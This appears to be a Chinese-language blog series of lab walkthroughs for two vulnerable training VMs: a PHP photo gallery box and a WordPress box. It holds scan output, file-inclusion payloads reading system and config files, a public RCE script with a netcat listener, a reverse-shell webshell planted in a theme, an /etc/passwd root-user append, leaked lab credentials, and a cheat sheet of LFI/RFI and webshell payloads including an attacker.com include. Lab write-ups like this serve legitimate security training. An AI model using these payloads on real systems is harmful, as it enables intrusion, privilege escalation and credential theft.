 28Running (JUST GUESSING): Linux 3.X|4.X|2.6.X|5.X (97%), MikroTik RouterOS 7.X (89%)
 29OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
 30Aggressive OS guesses: Linux 3.10 - 4.11 (97%), Linux 3.2 - 4.14 (97%), Linux 3.13 - 4.4 (91%), Linux 3.8 - 3.16 (91%), Linux 2.6.32 - 3.13 (91%), Linux 3.4 - 3.10 (91%), Linux 4.15 - 5.19 (91%), Linux 5.0 - 5.14 (91%), Linux 2.6.32 - 3.10 (90%), Linux 4.15 (89%)
 31No exact OS matches for host (test conditions non-ideal).
 32Service Info: Host: SNOOKUMS; OS: Unix
 33
 34Host script results:
 35|_smb2-time: Protocol negotiation failed (SMB2)
 36
 37OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
 38Nmap done: 1 IP address (1 host up) scanned in 89.62 seconds
 39
 40
 41┌──(kali㉿kali)-[~/Desktop]
 42└─$ sudo nmap --script=vuln -p$ports -Pn 192.168.236.58
 43Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-19 23:06 EDT
 44Nmap scan report for 192.168.236.58
 45Host is up (1.5s latency).
 46
 47PORT STATE SERVICE
 4821/tcp open ftp
 4922/tcp open ssh
 5080/tcp open http
 51| http-internal-ip-disclosure:
 52|_ Internal IP Leaked: 127.0.0.1
 53|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.'
 54| http-sql-injection:
 55| Possible sqli for queries:
 56| http://192.168.236.58:80/js/?C=S%3BO%3DA%27%20OR%20sqlspider
 57| http://192.168.236.58:80/js/?C=D%3BO%3DA%27%20OR%20sqlspider
 58| http://192.168.236.58:80/js/?C=M%3BO%3DA%27%20OR%20sqlspider
 59| http://192.168.236.58:80/js/?C=N%3BO%3DD%27%20OR%20sqlspider
 60| http://192.168.236.58:80/js/?C=N%3BO%3DA%27%20OR%20sqlspider
 61| http://192.168.236.58:80/js/?C=S%3BO%3DD%27%20OR%20sqlspider
 62| http://192.168.236.58:80/js/?C=M%3BO%3DA%27%20OR%20sqlspider
 63| http://192.168.236.58:80/js/?C=D%3BO%3DA%27%20OR%20sqlspider
 64| http://192.168.236.58:80/js/?C=N%3BO%3DA%27%20OR%20sqlspider
 65| http://192.168.236.58:80/js/?C=D%3BO%3DD%27%20OR%20sqlspider
 66| http://192.168.236.58:80/js/?C=M%3BO%3DA%27%20OR%20sqlspider
 67| http://192.168.236.58:80/js/?C=S%3BO%3DA%27%20OR%20sqlspider
 68| http://192.168.236.58:80/js/?C=N%3BO%3DA%27%20OR%20sqlspider
 69| http://192.168.236.58:80/js/?C=D%3BO%3DA%27%20OR%20sqlspider
 70| http://192.168.236.58:80/js/?C=M%3BO%3DD%27%20OR%20sqlspider
 71| http://192.168.236.58:80/js/?C=S%3BO%3DA%27%20OR%20sqlspider
 72| http://192.168.236.58:80/js/?C=N%3BO%3DA%27%20OR%20sqlspider
 73| http://192.168.236.58:80/js/?C=S%3BO%3DA%27%20OR%20sqlspider
 74| http://192.168.236.58:80/js/?C=M%3BO%3DA%27%20OR%20sqlspider
 75| http://192.168.236.58:80/js/?C=D%3BO%3DA%27%20OR%20sqlspider
 76| http://192.168.236.58:80/js/?C=S%3BO%3DA%27%20OR%20sqlspider
 77| http://192.168.236.58:80/js/?C=D%3BO%3DA%27%20OR%20sqlspider
 78| http://192.168.236.58:80/js/?C=M%3BO%3DA%27%20OR%20sqlspider
 79| http://192.168.236.58:80/js/?C=N%3BO%3DD%27%20OR%20sqlspider
 80| http://192.168.236.58:80/js/?C=N%3BO%3DA%27%20OR%20sqlspider
 81| http://192.168.236.58:80/js/?C=D%3BO%3DA%27%20OR%20sqlspider
 82| http://192.168.236.58:80/js/?C=S%3BO%3DA%27%20OR%20sqlspider
 83| http://192.168.236.58:80/js/?C=M%3BO%3DA%27%20OR%20sqlspider
 84| http://192.168.236.58:80/js/?C=N%3BO%3DA%27%20OR%20sqlspider
 85| http://192.168.236.58:80/js/?C=S%3BO%3DA%27%20OR%20sqlspider
 86| http://192.168.236.58:80/js/?C=M%3BO%3DA%27%20OR%20sqlspider
 87| http://192.168.236.58:80/js/?C=D%3BO%3DA%27%20OR%20sqlspider
 88| http://192.168.236.58:80/js/?C=N%3BO%3DA%27%20OR%20sqlspider
 89| http://192.168.236.58:80/js/?C=S%3BO%3DA%27%20OR%20sqlspider
 90| http://192.168.236.58:80/js/?C=M%3BO%3DA%27%20OR%20sqlspider
 91|_ http://192.168.236.58:80/js/?C=D%3BO%3DA%27%20OR%20sqlspider
 92|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
 93| http-enum:
 94| /README.txt: Interesting, a readme.
 95| /css/: Potentially interesting folder w/ directory listing
 96| /icons/: Potentially interesting folder w/ directory listing
 97| /images/: Potentially interesting folder w/ directory listing
 98|_ /js/: Potentially interesting folder w/ directory listing
 99|_http-csrf: Couldn't find any CSRF vulnerabilities.
100|_http-trace: TRACE is enabled
101|_http-dombased-xss: Couldn't find any DOM based XSS.
102111/tcp open rpcbind
103139/tcp open netbios-ssn
104445/tcp open microsoft-ds
1053306/tcp open mysql
106
107Host script results:
108| smb-vuln-regsvc-dos:
109| VULNERABLE:
110| Service regsvc in Microsoft Windows systems vulnerable to denial of service
111| State: VULNERABLE
112| The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference
113| pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes
114| while working on smb-enum-sessions.
115|_
116|_smb-vuln-ms10-054: false
117|_smb-vuln-ms10-061: false
118| smb-vuln-cve2009-3103:
119| VULNERABLE:
120| SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)
121| State: VULNERABLE
122| IDs: CVE:CVE-2009-3103
123| Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2,
124| Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a
125| denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE
126| PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location,
127| aka "SMBv2 Negotiation Vulnerability."
128|
129| Disclosure date: 2009-09-08
130| References:
131| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
132|_ http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
133
134Nmap done: 1 IP address (1 host up) scanned in 266.35 seconds
135
136http://192.168.236.58/index.php (Status: 200) [Size: 2730]
137http://192.168.236.58/images (Status: 301) [Size: 237] [--> http://192.168.236.58/images/]
138http://192.168.236.58/image.php (Status: 200) [Size: 1508]
139http://192.168.236.58/photos (Status: 301) [Size: 237] [--> http://192.168.236.58/photos/]
140http://192.168.236.58/css (Status: 301) [Size: 234] [--> http://192.168.236.58/css/]
141http://192.168.236.58/license.txt (Status: 200) [Size: 18511]
142http://192.168.236.58/db.php (Status: 200) [Size: 0]
143http://192.168.236.58/README.txt (Status: 200) [Size: 4041]
144http://192.168.236.58/js (Status: 301) [Size: 233] [--> http://192.168.236.58/js/]
145
146┌──(kali㉿kali)-[~/Desktop]
147└─$ whatweb http://192.168.236.58/
148http://192.168.236.58/ [200 OK] Apache[2.4.6], Country[RESERVED][ZZ], Google-Analytics[UA-2196019-1], HTML5, HTTPServer[CentOS][Apache/2.4.6 (CentOS) PHP/5.4.16], IP[192.168.236.58], JQuery[1.7.2], Lightbox, PHP[5.4.16], Script, Title[Simple PHP Photo Gallery], X-Powered-By[PHP/5.4.16]

80端口打开网页是一个相册，鼠标悬停在图片上可以在右下角看到图片的地址。，能判断有一个image文件夹。文件夹没有什么特别的发现。 Nmap的扫描结果发现有个README.txt文件，读取一下

 1==========================
 2 Simple PHP Photo Gallery
 3==========================
 4
 5Copyright John Caruso 2005-2008
 6https://sourceforge.net/projects/simplephpgal/
 7
 8
 9A) Embedded Gallery or Standalone
 10==================================
 11You can embed the gallery into existing pages or use it as a standalone page.
 12
 13To use it as a Standalone page, just follow the instructions in steps (B) and (C).
 14
 15To use it as an embedded Gallery in an existing page:
 161) Copy the the code from the embeddedGallery.php file (or just use an include("embeddedGallery.php") statement in your existing php file).
 172) Follow step (B) with the following modifications
 18 * B.1) The gallery title will not be taken from the folder name, but rather the config file. Make sure to uncomment the $galleryTitle = "title"; line and place your desired title in the quotes.
 19 * B.2) Do not include index.php when copying the files from the .zip file
 20 * C.2) Do not include index.php if you want to create your own index page. Just include the embeddedGallery.php file in your own script
 21
 22B) Steps to setup your photogallery.
 23====================================
 24
 251) Create a new folder with the name that you would like your gallery title to be.
 26 * use the underscore "_" for spaces (eg. My_Vacation)
 27 * you can only use characters that are allowable for folder names
 282) Put all the files contained in this .zip file into the folder you just created
 293) If they do not already exist, create two folders named 'phpGallery_thumbs' and 'phpGallery_images' inside your folder. You will need WRITE permissions on the phpGallery_thumbs directory.
 304) Put all of the photos that you want displayed in your gallery into the phpGallery_images folder
 31 * by default they will be displayed in alphabetical order. This can be modified in the phpGalleryConfig.php file by setting the $sortMode variable at the bottom of the file
 325) Upload your directory to your website.
 33 * The first time you view the gallery it will take some time to load because thumbnails are being generated (If the page times out and nothing is shown on the screen, refresh the page. You may need to do this several times if you have a lot of images)
 34
 35
 36C) For Multiple Photo Galleries
 37================================
 38If you want to create multiple photo galleries:
 39
 401) Create a folder with the name that you would like your gallery listing to have.
 41 * use the underscore "_" for spaces (eg. My_Galleries)
 42 * you can only use characters that are allowable for folder names
 432) Place the index.php, embeddedGallery.php and phpGalleryConfig.php files from this .zip file into the folder
 443) Do the steps in (A) for as many galleries as you want to display, and place them into the folder you created in the previous step
 45
 46
 47
 48D) Modifying the Style
 49=======================
 50Every element in the gallery script is attached to a CSS class.
 51
 52If you are using the gallery as an embedded gallery, copy and paste the CSS classes/elements from the phpGalleryStyle.css file and paste them into your current stylesheet. I have tried to make the names as unique as possible.
 53
 54If you are using the gallery as a standalone page, you can make your modifications directly to the phpGalleryStyle.css file.
 55
 56
 57
 58
 59
 60NOTE:
 61
 62i) Your webserver must have PHP version 3.0 or higher, and GD 2.0 or higher installed in order for the gallery software to work.
 63 To check this, create a php file with the line <?php phpinfo(); ?> and run it to see what modules are installed.
 64
 65ii) Should work for JPG, JPEG, PNG and GIF files (for both upper and lowercase file extensions)
 66
 67iii) Feel free to remove the copyright information (I agree it is quite ugly), under the condition that you aren't going to try to break what the copyright is intended to protect :)
 68
 69iv) Have fun and enjoy!
 70
 71Oh and if you don't mind, drop me a line at simplephpgallery@gmail.com with the URL to your website that you are using the gallery script on. I enjoy seeing how something I've done has helped out someone else! 
 72
 73---翻译
 74
 75好的，这是您提供的“Simple PHP Photo Gallery”文档的中文翻译（纯文字格式）：
 76
 77Simple PHP Photo Gallery
 78
 79
 80版权 John Caruso 2005-2008
 81https://sourceforge.net/projects/simplephpgal/
 82
 83A) 嵌入式图库或独立图库
 84
 85您可以将图库嵌入到现有页面中，或者将其用作独立页面。
 86
 87作为独立页面使用： 只需按照步骤 (B) 和 (C) 中的说明操作即可。
 88
 89作为嵌入式图库在现有页面中使用：
 90
 91 1. 复制 embeddedGallery.php 文件中的代码（或者直接在您现有的 PHP 文件中使用 include("embeddedGallery.php") 语句）。
 92 2. 按照步骤 (B) 操作，但需进行以下修改：
 93 B.1) 图库标题将不再取自文件夹名称，而是取自配置文件。请确保取消注释 $galleryTitle "title"; 这一行，并将您想要的标题放在引号内。
 94
 95 B.2) 从 .zip 文件中复制文件时，不要包含 index.php。
 96
 97 3. (C.2) 如果您想创建自己的索引页，不要包含 index.php。只需在您自己的脚本中包含 embeddedGallery.php 文件。
 98
 99B) 设置您的照片图库的步骤
100
1011. 创建一个新文件夹，名称即为您想要的图库标题。
102 使用下划线 "_" 表示空格（例如：My_Vacation）。
103
104 只能使用文件夹名称允许的字符。
105
1062. 将本 .zip 文件中包含的所有文件放入您刚刚创建的文件夹中。
1073. 如果不存在，在您的文件夹内创建两个名为 phpGallery_thumbs 和 phpGallery_images 的文件夹。您需要对 phpGallery_thumbs 目录具有写入 (WRITE) 权限。
1084. 将所有想要在图库中显示的照片放入 phpGallery_images 文件夹中。
109 默认情况下，它们将按字母顺序显示。可以通过修改 phpGalleryConfig.php 文件底部的 $sortMode 变量来更改此行为。
110
1115. 将您的目录上传到您的网站。
112 第一次查看图库时，加载可能需要一些时间，因为正在生成缩略图（如果页面超时且屏幕上没有任何显示，请刷新页面。如果您有很多图像，可能需要多次刷新）。
113
114C) 创建多个照片图库
115
116如果您想创建多个照片图库：
117
1181. 创建一个文件夹，名称即为您想要的图库列表标题。
119 使用下划线 "_" 表示空格（例如：My_Galleries）。
120
121 只能使用文件夹名称允许的字符。
122
1232. 将本 .zip 文件中的 index.php、embeddedGallery.php 和 phpGalleryConfig.php 文件放入此文件夹。
1243. 按照 (A) 部分的步骤操作，创建您想要显示的任意多个图库，并将它们放入上一步创建的文件夹中。
125
126D) 修改样式
127
128图库脚本中的每个元素都关联着一个 CSS 类。
129
130嵌入式图库： 复制 phpGalleryStyle.css 文件中的 CSS 类/元素，并将其粘贴到您当前的样式表中。我尽量使类名唯一。
131
132独立页面图库： 可以直接修改 phpGalleryStyle.css 文件。
133
134注意 (NOTE):
135
136i) 您的 Web 服务器必须安装 PHP 3.0 或更高版本以及 GD 2.0 或更高版本，图库软件才能工作。
137 要检查这一点，创建一个包含 <?php phpinfo(); ?> 行的 PHP 文件并运行它，查看安装了哪些模块。
138
139ii) 应支持 JPG, JPEG, PNG 和 GIF 文件（文件扩展名大小写均可）。
140
141iii) 可以自由删除版权信息（我同意它不太美观），条件是您不会试图破坏版权旨在保护的内容 :)
142
143iv) 祝您使用愉快！
144
145哦，如果您不介意，请发邮件到 simplephpgallery@gmail.com 告诉我您使用该图库脚本的网站 URL。我很高兴看到我做的东西帮助了别人！

发现这个PHP相册有用include的方式来展现图片，文字中 “或者直接在您现有的 PHP 文件中使用 include(“embeddedGallery.php”) 语句）“这一句说明了，存在文件包含。搜索一下网上这个文件包含的利用方法如下。

Question

文件包含漏洞有哪些用法

文件包含漏洞

http://192.168.236.58/image.php?img=php://filter/convert.base64-encode/resource=/etc/passwd

http://192.168.236.58/image.php?img=php://filter/convert.base64-encode/resource=/var/www/html/db.php

1<?php
2define('DBHOST', '127.0.0.1');
3define('DBUSER', 'root');
4define('DBPASS', 'MalapropDoffUtilize1337');
5define('DBNAME', 'SimplePHPGal');
6?

得到数据库用户名和密码，观察端口发现3306端口打开，尝试登录发现不允许外部地址登录。

数据库密码

root MalapropDoffUtilize1337

Simple PHP Photo Gallery 漏洞

从Whatweb的结果中看，这是一个 Simple PHP Photo Gallery 的相册框架，搜索相关的漏洞发现有脚本可以利用。

https://github.com/beauknowstech/SimplePHPGal-RCE.py

1# 终端1
2rlwrap -cAr nc -nlvp 445
3# 终端2
4git clone https://github.com/beauknowstech/SimplePHPGal-RCE.py.git
5cd SimplePHPGal-RCE.py
6python3 SimplePHPGal-RCE.py http://192.168.236.58/ 192.168.45.238 445
7python -c 'import pty;pty.spawn("/bin/bash")'

注意这里最好是用靶机以及开放打开的端口，比如这里的445端口。

内网信息收集

现在就可以登录数据库了

解码两次密码得到：

username	password	解码	第二次解码
josh	VFc5aWFXeHBlbVZJYVhOelUyVmxaSFJwYldVM05EYz0=	TW9iaWxpemVIaXNzU2VlZHRpbWU3NDc=	MobilizeHissSeedtime747
michael	U0c5amExTjVaRzVsZVVObGNuUnBabmt4TWpNPQ==	SG9ja1N5ZG5leUNlcnRpZnkxMjM=	HockSydneyCertify123
serena	VDNabGNtRnNiRU55WlhOMFRHVmhiakF3TUE9PQ==	T3ZlcmFsbENyZXN0TGVhbjAwMA==	OverallCrestLean000

home文件夹下只有一个用户文件夹michael，尝试用数据库中得到的密码su一下用户。拿到第一个flag。搜一下常见的提权点，并未发现常见的可以提权的点查看是否还有其他可用的用户时发现passwd文件当前用户Micheal即可写入，那么直接写一个新用户，新的管理员用户即可。

1echo 'root2::0:0::/root:/bin/bash' >> /etc/passwd
2su root2

拿到第二个flag

总结

入侵路径示意图

flowchart TD
 %% 资产列表
 A[Kali攻击机 
 192.168.45.238]
 B[靶机 
 192.168.236.58]
 C[获取数据库密码]
 D[获取apache终端]
 E[获取michael用户密码并登录]
 F[root]

 %% 路径关系
 A-->|扫描|B
 B-->|文件包含漏洞|C
 B-->|SimplePHPG漏洞|D
 C-->|数据库解码|E
 D-->E
 E-->|/etc/passwd权限配置不当|F
 


	%% 线型：---（实线）、-.->（虚线）、==>（粗箭头）
	%% -->|是|：带条件文本的连接
	%% 矩形节点[ ]，菱形决策节点{ }，圆弧方节点()
 %% 样式定义
 classDef attack fill:#ffcccc,stroke:#ff0000,stroke-width:2px;
 classDef public fill:#ffeecc,stroke:#ff9900,stroke-width:2px; 
 classDef internal fill:#ccffcc,stroke:#009900,stroke-width:2px; 
 %% 线型与颜色方案（亮色/暗色通用）
	linkStyle default stroke:#666666,stroke-width:2px,stroke-dasharray:0; 

 %% 应用样式
 class A attack;
 class B,C,D public;
 class E,F internal;

入侵时间表

gantt
 title 攻击时间表
 dateFormat YYYY-MM-DD HH:mm
 axisFormat %H:%M
 
 section 侦察阶段
 目标扫描 :a1, 2025-08-20 11:4, 2025-08-20 12:30
 漏洞识别 :a2, after a1, 2025-08-20 13:03
 
 section 攻击阶段
 初始访问 :b1, after a2, 2025-08-20 13:20
 权限提升 :crit,b2, after b1, 3m
 
 section 后渗透阶段
 数据窃取 :c1, after b2, 1m

文件包含漏洞（LFI/RFI）

文件包含漏洞（LFI/RFI）的核心在于利用动态文件加载机制，通过控制包含路径参数实现敏感文件读取或恶意代码执行。以下是常见利用方式及技术细节，按协议和场景分类整理：

📁 一、本地文件包含（LFI）基础利用

敏感文件读取
- 路径遍历：通过../跳转目录读取系统文件。
  - ?file=../../../../etc/passwd→ 泄露用户账户信息。
  - Windows 系统：?file=../../Windows/win.ini→ 获取系统配置。
- 空字节截断（PHP <5.3.4）：
  - ?file=../../../etc/passwd%00→ 绕过后缀限制（如.php）。
日志文件注入
- 污染日志：在请求头中注入恶意代码（如User-Agent: <?php system($_GET['cmd']);?>）。
- 包含日志：?file=/var/log/apache2/access.log&cmd=id→ 执行注入的代码。
Session 文件利用
- 注入恶意 Session：通过登录表单设置PHPSESSID=evil并提交username=<?php system('id');?>。
- 包含 Session 文件：?file=/tmp/sess_evil→ 执行代码。

🌐 二、伪协议高级利用

🔧 1. `php://filter`（源码泄露）

Base64 编码读取：避免 PHP 代码直接执行。
- ?file=php://filter/convert.base64-encode/resource=config.php→ 获取配置文件 Base64 编码内容。
编码绕过技巧：
- 多重过滤器：?file=php://filter/convert.iconv.UTF-8.UTF-16/resource=index.php→ 绕过简单过滤。

⚡ 2. `php://input`（代码执行）

POST 请求执行代码：需allow_url_include=On。
- ?file=php://input+ POST Body：<?php system('id');?>→ 直接执行系统命令。

写入 Webshell：

<?php fputs(fopen('shell.php','w'),'<?php @eval($_POST[cmd]);?>'); ?>

通过包含触发写入。

📦 3. 压缩协议（绕过上传限制）

上传含恶意代码的shell.zip（内部含shell.php），重命名为image.jpg。
?file=zip:///path/to/image.jpg%23shell.php→ 解压并执行代码。
类似zip://，额外支持反序列化攻击。

💥 4. `data://`（直接代码执行）

嵌入 PHP 代码：需allow_url_include=On。
- ?file=data://text/plain,<?php phpinfo();?>→ 直接输出phpinfo。
Base64 编码绕过：
- ?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOz8+→ 执行编码后的代码。

🎯 三、远程文件包含（RFI）

远程加载恶意文件
- ?file=http://attacker.com/shell.txt→ 包含远程服务器上的 Webshell（需allow_url_include=On）。
- 绕过技巧：添加?或%23截断后缀：
  - ?file=http://attacker.com/shell.txt%23→ 忽略本地追加的后缀（如.php）。
结合 DNS 重绑定
- 使同一 URL 在不同时间解析到攻击者服务器和本地文件，绕过 IP 限制。

⚙️ 四、环境变量与临时文件

/proc/self/environ利用
- 通过User-Agent注入代码：
  - User-Agent: <?php system($_GET['cmd']);?>。
  - ?file=/proc/self/environ&cmd=id→ 执行注入命令。
临时文件包含
- 结合文件上传漏洞，包含上传的临时文件路径（如/tmp/phpXXXXXX）。

🛠️ 五、绕过过滤技巧

双写绕过：?file=....//....//etc/passwd→ 应对str_replace("../", "")过滤。
绝对路径绕过：?file=file:///etc/passwd→ 直接指定绝对路径。
长度截断：超长文件名（Windows >256字符，Linux >4096字符）自动截断后缀。

💎 总结

文件包含漏洞的利用核心在于控制输入路径和利用协议特性：

敏感信息泄露 → php://filter+ Base64 编码。
代码执行 → php://input/data://+ POST 代码注入。
绕过限制 → 压缩协议（zip:///phar://）或路径遍历技巧。防御需结合白名单验证、协议禁用（如allow_url_include=Off）和输入过滤 。

🔔 想要获取更多网络安全与编程技术干货？

关注 泷羽Sec-静安 公众号，与你一起探索前沿技术，分享实用的学习资源与工具。我们专注于深入分析，拒绝浮躁，只做最实用的技术分享！💻

马上加入我们，共同成长！🌟

👉 长按或扫描二维码关注公众号

直接回复文章中的关键词，获取更多技术资料与书单推荐！📚

Day25 Web Developer靶场WP

Mon, 04 Aug 2025 20:42:26 +0000

关注泷羽Sec和泷羽Sec-静安公众号，这里会定期更新与 OSCP、渗透测试等相关的最新文章，帮助你理解网络安全领域的最新动态。后台回复“OSCP配套工具”获取本文的工具

链接地址下载虚拟镜像：

https://www.vulnhub.com/entry/web-developer-1,288/

信息收集

1# Kali攻击机地址
2172.168.169.141
3# 靶机地址
4172.168.169.146

扫描端口和目录

1# 扫描端口
2ports=$(sudo nmap -p- --min-rate=10000 -Pn 172.168.169.146 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
3echo $ports
4# 扫描服务
5sudo nmap -sT -sC -sV -O -Pn -p$ports 172.168.169.146
6sudo nmap --script=vuln -p$ports -Pn 172.168.169.146
7# 扫描目录
8gobuster dir -e -u http://172.168.169.146 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
9whatweb http://172.168.169.146/

扫描结果如下：

 1┌──(kali㉿kali)-[~]
 2└─$ echo $ports
 322,80
 4
 5┌──(kali㉿kali)-[~/Desktop/Webdeveloper]
 6└─$ sudo nmap -sT -sC -sV -O -Pn -p$ports 172.168.169.146
 7Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-04 22:01 EDT
 8Nmap scan report for 172.168.169.146
 9Host is up (0.0018s latency).
 10
 11PORT STATE SERVICE VERSION
 1222/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
 13| ssh-hostkey:
 14| 2048 d2:ac:73:4c:17:ec:6a:82:79:87:5a:f9:22:d4:12:cb (RSA)
 15| 256 9c:d5:f3:2c:e2:d0:06:cc:8c:15:5a:5a:81:5b:03:3d (ECDSA)
 16|_ 256 ab:67:56:69:27:ea:3e:3b:33:73:32:f8:ff:2e:1f:20 (ED25519)
 1780/tcp open http Apache httpd 2.4.29 ((Ubuntu))
 18|_http-title: Example site &#8211; Just another WordPress site
 19|_http-generator: WordPress 4.9.8
 20|_http-server-header: Apache/2.4.29 (Ubuntu)
 21MAC Address: 00:0C:29:59:30:A8 (VMware)
 22Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
 23Device type: general purpose
 24Running: Linux 3.X|4.X
 25OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
 26OS details: Linux 3.2 - 4.14
 27Network Distance: 1 hop
 28Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
 29
 30OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
 31Nmap done: 1 IP address (1 host up) scanned in 13.44 seconds
 32
 33┌──(kali㉿kali)-[~/Desktop/Webdeveloper]
 34└─$ sudo nmap --script=vuln -p$ports -Pn 172.168.169.146
 35Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-04 22:01 EDT
 36Nmap scan report for 172.168.169.146
 37Host is up (0.0013s latency).
 38
 39PORT STATE SERVICE
 4022/tcp open ssh
 4180/tcp open http
 42|_http-dombased-xss: Couldn't find any DOM based XSS.
 43| http-wordpress-users:
 44| Username found: webdeveloper
 45|_Search stopped at ID #25. Increase the upper limit if necessary with 'http-wordpress-users.limit'
 46|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
 47| http-sql-injection:
 48| Possible sqli for queries:
 49| http://172.168.169.146:80/wp-includes/js/jquery/?C=M%3BO%3DA%27%20OR%20sqlspider
 50| http://172.168.169.146:80/wp-includes/js/jquery/?C=D%3BO%3DA%27%20OR%20sqlspider
 51| http://172.168.169.146:80/wp-includes/js/jquery/?C=N%3BO%3DD%27%20OR%20sqlspider
 52|_ http://172.168.169.146:80/wp-includes/js/jquery/?C=S%3BO%3DA%27%20OR%20sqlspider
 53| http-csrf:
 54| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=172.168.169.146
 55| Found the following possible CSRF vulnerabilities:
 56|
 57| Path: http://172.168.169.146:80/
 58| Form id: search-form-6891660b62bd2
 59| Form action: /
 60|
 61| Path: http://172.168.169.146:80/index.php/2018/10/
 62| Form id: search-form-6891660c3be84
 63| Form action: /
 64|
 65| Path: http://172.168.169.146:80/wp-login.php
 66| Form id: loginform
 67| Form action: /wp-login.php
 68|
 69| Path: http://172.168.169.146:80/index.php/category/uncategorized/
 70| Form id: search-form-6891660f60ed9
 71| Form action: /
 72|
 73| Path: http://172.168.169.146:80/index.php/2018/10/%5C
 74| Form id: search-form-6891661069879
 75| Form action: /
 76|
 77| Path: http://172.168.169.146:80/index.php/comments/feed/1quot;https:/gravatar.com&quot;&gt;Gravatar&lt;/a&gt;.]]/
 78| Form id: search-form-689166118697a
 79| Form action: /
 80|
 81| Path: http://172.168.169.146:80/wp-login.php?action=lostpassword
 82| Form id: lostpasswordform
 83|_ Form action: /wp-login.php?action=lostpassword
 84| http-enum:
 85| /wp-login.php: Possible admin folder
 86| /readme.html: Wordpress version: 2
 87| /: WordPress version: 4.9.8
 88| /wp-includes/images/rss.png: Wordpress version 2.2 found.
 89| /wp-includes/js/jquery/suggest.js: Wordpress version 2.5 found.
 90| /wp-includes/images/blank.gif: Wordpress version 2.6 found.
 91| /wp-includes/js/comment-reply.js: Wordpress version 2.7 found.
 92| /wp-login.php: Wordpress login page.
 93| /wp-admin/upgrade.php: Wordpress login page.
 94|_ /readme.html: Interesting, a readme.
 95MAC Address: 00:0C:29:59:30:A8 (VMware)
 96
 97Nmap done: 1 IP address (1 host up) scanned in 33.32 seconds
 98
 99┌──(kali㉿kali)-[~/Desktop/Webdeveloper]
100└─$ whatweb http://172.168.169.146/
101http://172.168.169.146/ [200 OK] Apache[2.4.29], Country[UNITED STATES][US], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.29 (Ubuntu)], IP[172.168.169.146], JQuery[1.12.4], MetaGenerator[WordPress 4.9.8], PoweredBy[WordPress,WordPress,], Script[text/javascript], Title[Example site &#8211; Just another WordPress site], UncommonHeaders[link], WordPress[4.9.8]
102
103===============================================================
104Starting gobuster in directory enumeration mode
105===============================================================
106http://172.168.169.146/wp-content (Status: 301) [Size: 323] [--> http://172.168.169.146/wp-content/]
107http://172.168.169.146/wp-includes (Status: 301) [Size: 324] [--> http://172.168.169.146/wp-includes/]
108http://172.168.169.146/wp-admin (Status: 301) [Size: 321] [--> http://172.168.169.146/wp-admin/]
109http://172.168.169.146/server-status (Status: 403) [Size: 303]
110Progress: 220559 / 220560 (100.00%)
111===============================================================
112Finished
113===============================================================

可以看到是wordpress系统，这个洞老多了。一会上wpscan扫。

数据库注入的nmap扫描提示，但实际是文件未授权访问

wpscan开扫

1wpscan --update --enumerate ap,t,u --api-token 6Chbzkayn13XcMOgzoDGA85OLpV5BbXhGQ55s8qz88g --plugins-detection aggressive --url http://172.168.169.146/

这里提示数据库连接不对，也提示了用户名和密码存放在wp-config.php中。点了这个页面后靶机就挂了，也可能是wpscan给扫崩的，只能重启一下了。扫出来提示用户名 webdeveloper 继续爆破密码，太漫长了，后面换了个小字典也是爆破不出来，放弃。

1 wpscan --url http://172.168.169.146/ -U user.txt -P /usr/share/wordlists/rockyou.txt

换个字典再扫一次，发现了之前没扫出来的文件。

1dirsearch -x 302,403 -u http://172.168.169.146/ -w /usr/share/dirb/wordlists/common.txt

流量包信息分析

打开新扫描到的目录发现一个流量包文件，下载后分析分析流量发现有两个数字最多的IP，活动频繁就说明有爆破或者扫描的内容。搜蓝一下确实发现222这个IP用POST传了一个什么东西上去

流量包分析中用到的命令

1tshark -r analyze.cap
2# 统计IP频率
3tshark -r analyze.cap | awk -F" " '{print $3}' | sort | uniq -c | head
4# 指定查看某个IP的流量
5sudo tcpdump -n src host 192.168.1.176 -r analyze.cap
6# 只看 POST的结果
7sudo tcpdump -nX dst host 192.168.1.176 -r analyze.cap |grep POST
8# 解析出来结果
9tshark -r analyze.cap -Y "ip.dst==192.168.1.176 && http.request.method==POST" -V

webdeveloper登陆密码

Te5eQg&4sBS!Yr$)wf%(DcAd

后台漏洞利用

登录成功

发现可以直接修改主题模板文件，直接改php，选择404页面，不要选择index 比较隐蔽，而且每一次有人点错了页面都能重新连接一下。找马，复制，改马，修改到主题上。

1 cp /usr/share/webshells/php/php-reverse-shell.php .
2 sed -i -E "s/ip\s*=\s*'127\.0\.0\.1'\s*;/ip = '172.168.169.141';/g; s/port\s*=\s*1234\s*;/port = 4777;/g" php-reverse-shell.php

内网信息收集

看一下网页配置文件就发现了数据库密码

数据库密码

webdeveloper MasterOfTheUniverse

